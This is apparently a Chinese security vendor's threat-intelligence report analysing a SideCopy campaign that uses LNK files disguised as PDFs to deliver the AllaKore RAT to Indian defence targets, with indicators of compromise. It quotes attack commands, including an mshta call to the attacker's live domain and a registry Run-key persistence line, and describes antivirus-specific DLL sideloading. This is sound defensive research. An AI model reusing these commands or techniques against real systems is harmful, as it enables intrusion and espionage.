警惕LNK文件攻击导致数据窃取!SideCopy近期针对印度地区攻击活动分析
事件背景
近日,安恒猎影实验室捕获到SideCopy组织针对印度国防部的攻击样本,样本攻击流程仍然以模仿SideWinder为主,通过钓鱼邮件下发包含有恶意LNK文件的压缩包,该LNK文件伪装成PDF文件诱使目标运行,运行后下载多阶段加载器,最后释放SideCopy组织常用的远控工具AllaKoreRAT。
诱饵文件冒充指挥官副手向陆军部队下发指令,完整信函如下。
攻击流程如下图:
攻击分析
第一阶段
原始样本中包含伪装成PDF文件的LNK文件,运行后将执行C:\Windows\System32\mshta.exe https://tmeew.com/assets/carousel/files/LVE_CUM_POSTING_(ARMY_PERS)/jspxtoolkit
LNK文件中执行的链接将跳转至
hxxps://tmeew[.]com/assets/carousel/files/LVE_CUM_POSTING_(ARMY_PERS)/jspxtoolkit/jqueryxmlcss.hta
该代码来自开源项目CACTUSTORCH,魔改后的函数参数为data, filename
在加载器中对应代码如下,即传入数据经base64解码并解压到%Temp%目录下
随后检测本地是否开启WindowsDefender,并下载后续负载
hxxps://tmeew[.]com/assets/carousel/nttoolkit/ -> C:\\ProgramData\\HP\\jquery.txt;
hxxps://tmeew[.]com/assets/carousel/cyxtoolkit/ -> C:\\ProgramData\\HP\\jscy.txt
第二阶段
下载的文件jquery.txt仍然是采用base64解码后解压的方式得到jquery.hta
jquery.hta与一阶段jqueryxmlcss.hta的文件逻辑构造相似,增加有反病毒产品检测,以及参数变更为exeBytes, dllBytes
第二阶段DLL文件将根据目标机器上安装的反病毒产品进行后续操作
针对Kaspersky杀毒软件
- 创建C:\\ProgramData\\gvnntr\\目录,将C:\\Windows\\System32\\credwiz.exe文件拷贝至该目录,在自启目录以及C:\\Users\\Public\\目录下创建gvnntrSettings.lnk文件用于启动credwiz.exe并实现持久化,lnk文件包含指令如下:C:\Windows\System32\cmd.exe -/c start /b C:\ProgramData\gvnntr\credwiz.exe
- 将EXE数据(3b4abb7b29f7f41b30f4ed8d86dc6c8a)写入%Temp%\\gvnntr\\gvnntr.txt,并将DLL数据(cf134c9ac335f549055fe2eff65e9921)写入C:\\ProgramData\\newimage.jpg,写入成功后将newimage.jpg移动至C:\\ProgramData\\gvnntr\\DUser.dll
- 通过Powershell指令将%Temp%\\gvnntr\\gvnntr.txt重命名为gvnntr.exe
- 最后执行C:\\Users\\Public\\gvnntrSettings.lnk
针对Avast杀毒软件
- 创建C:\\ProgramData\\gvnntr\\目录,将C:\\Windows\\SysWOW64\\credwiz.exe文件拷贝至该目录
- 将DLL数据写入C:\\ProgramData\\newimage.jpg后将newimage.jpg移动至C:\\ProgramData\\gvnntr\\DUser.dll
- 在C:\\ProgramData\\gvnntr\\目录下创建gvnntr.bat文件并启动以实现持久化,gvnntr.bat文件内容如下:REG ADD “HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /V “gvnntr” /t REG_SZ /F /D “C:\ProgramData\gvnntr\credwiz.exe”
- 直接将EXE数据写入%Temp%\\gvnntr\\gvnntr.exe
- 休眠3min后,启动 C:\ProgramData\gvnntr\credwiz.exe
针对Avira杀毒软件
在C:\\ProgramData\\gvnntr\\目录下创建gvnntr.bat文件并启动以实现持久化,gvnntr.bat内容同上,将EXE数据写入TXT,DLL数据写入DUser.dll
针对Quick杀毒软件
- 创建C:\\ProgramData\\gvnntr\\,将credwiz.exe文件拷贝至该目录,将DLL数据写入C:\\ProgramData\\extrafile.txt后移动至C:\\ProgramData\\gvnntr\\DUser.dll
- 通过BAT文件实现持久化,释放EXE数据到%Temp%\\gvnntr\\gvnntr.exe
- 休眠1min,启动 C:\ProgramData\gvnntr\credwiz.exe
针对WindowsDefender杀毒软件
- 创建C:\\ProgramData\\gvnntr\\,将credwiz.exe文件拷贝至该目录,将DLL数据写入C:\\ProgramData\\newimage.jpg后将newimage.jpg移动至C:\\ProgramData\\gvnntr\\DUser.dll,
- 在C:\\ProgramData\\gvnntr\\目录下创建gvnntr.bat文件并启动以实现持久化,将EXE数据写入%Temp%\\gvnntr\\gvnntr.exe
- 休眠1min,启动 C:\ProgramData\gvnntr\credwiz.exe
Loader下载的另一文件jscy.txt,主要是将上述变量gvnntr更改为vmmbs,其他逻辑均不变。其中EXE数据与DLL数据hash值如下
072fb8ca7c0dce0888707ccbbd37723d | DLL
98a0ed81f68297ea804e8209a28b91be | EXE
第三阶段
credwiz.exe启动后将加载同目录下的DUser.dll,该DLL的主要功能为启动%Temp%\\gvnntr\\gvnntr.exe
gvnntr.exe为最终阶段远控软件AllaKore RAT。AllaKore是一种公开可用的基于Delphi的RAT,常与CetaRAT一起用于SideCopy的攻击活动中。 AllaKore的恶意功能包括:键盘记录、捕获屏幕截图、列出文件夹和文件、上传/下载文件、窃取剪贴板数据、获取/更换壁纸。
此次活动中,该RAT被命名为POISONManager
其中包含的29553fb6797c15d99bcb2d9e27abd49d组件可关联到其他AllaKore远控工具,最终连接到 209.126.80.23:{6391、3281}
tmeew[.]com解析到162.241.85.104
思考总结
关联
通过样本特征我们关联到该组织在今年上半年攻击活动中的样本如下
Hash | FileName/描述 |
2e4dad3a26976010983cc142127db4e5 | LVE_CUM_POSTING_(ARMY_PERS).pdf.lnk |
8d2c06e34c6c8b8fa7fb10a11155209a | IMG_20210824_093557.jpg.lnk |
02b05564439ed9a3bb00a869d06c05dd | IMG_20210420_160203.jpg.lnk |
6defaf3c52ed85aa056546ad17137369 | pay and allces.pdf.lnk.jpg.lnk(薪酬与福利) |
254deb71e7833cd784f0112b120a22f6 | IMG_20201230_130459.jpg.lnk |
1e437d8cb03950655d38a310928de43c | Army-Cyber-Gp-Alt-Feb-2022.pdf.lnk(陆军网络研究所) |
4eda1982d897c05df9f501e812da645a | IMG_20210107_113330.jpg.lnk |
73396e95fd451ec770575c5ca15a3994 | IMG_20210107_113433.jpg.lnk |
3fc3f755d6ffb0fe05255a107e23fdc9 | Updated-Pay-and-Allowances-Order.pdf.lnk(更新的工资和津贴订单) |
8087271af2e88e6d0a2155e910e8d7bd | IMG_20210107_113548.jpg.lnk |
278ea2f466cee0c26849b49b04cfd064 | IMG_20210423_145311.jpg.lnk |
f01f09fbbecac9082005f45240ae0ca8 | (Covid 19 审查文件) |
9840f8c397dd5a978f6b10044dca54ff | IMG_20210107_114816.jpg.lnk |
d59cc2050e4a604231ac17c05af3b6a6 | (选举相关) |
199f37e9a4e639487900c368eb7699b8 | IMG_20210424_112355.jpg.lnk |
61138dcf0a7cf4aaa224745f45826350 | revised-criteria.pdf.lnk(单位修订文件审查) |
281f5db2e7bdc3765a15035fa11f8364 | IMG_20210107_113448.jpg.lnk |
bdd4de79eec3683377102d667438d42c | IMG_20210117_122021.jpg.lnk |
255e2c84f53e7be6dfb830a8cc73b276 | IMG_20210424_112355.jpg.lnk |
总结
SideCopy组织近一年来攻击活动频繁,攻击武器C#、Delphi发展至Golang,从Windows发展至多平台,攻击目标却始终牢牢锁定印度国防部。此外,该组织乐此不疲地在攻击活动中使用LNK伪装成图片、Word、PDF等文件,说明此攻击手段针对特定目标人群有较大的成功率。
安恒建议广大用户谨慎对待未知来源的邮件附件及链接,提高对LNK文件攻击的警惕。如有需要鉴别的未知来源样本,可以投递至安恒云沙箱查看判别结果后再进行后续操作。
防范建议
目前安全数据部已具备相关威胁检测能力,对应产品已完成IoC情报的集成:
安恒产品已集成能力:
针对该事件中的最新IoC情报,以下产品的版本可自动完成更新,若无法自动更新则请联系技术人员手动更新:
(1)AiLPHA分析平台V5.0.0及以上版本
(2)AiNTA设备V1.2.2及以上版本
(3)AXDR平台V2.0.3及以上版本
(4)APT设备V2.0.67及以上版本
(5)EDR产品V2.0.17及以上版本
安恒云沙盒已集成了该事件中的样本特征。用户可通过云沙盒:https://ti.dbappsecurity.com.cn/sandbox,对可疑文件进行免费分析,并下载分析报告。
IOC
e2ade70b7091dda09badb538be449ec6
2e4dad3a26976010983cc142127db4e5
CF134C9AC335F549055FE2EFF65E9921
C6EEEB58E67A3141B7F1F92A21DB6BF2
0C6CF1C1E9C45A6FD1689F63118CED76
3B4ABB7B29F7F41B30F4ED8D86DC6C8A
98A0ED81F68297EA804E8209A28B91BE
tmeew[.]com
162.241.85.104
209.126.80.23:{6391、3281}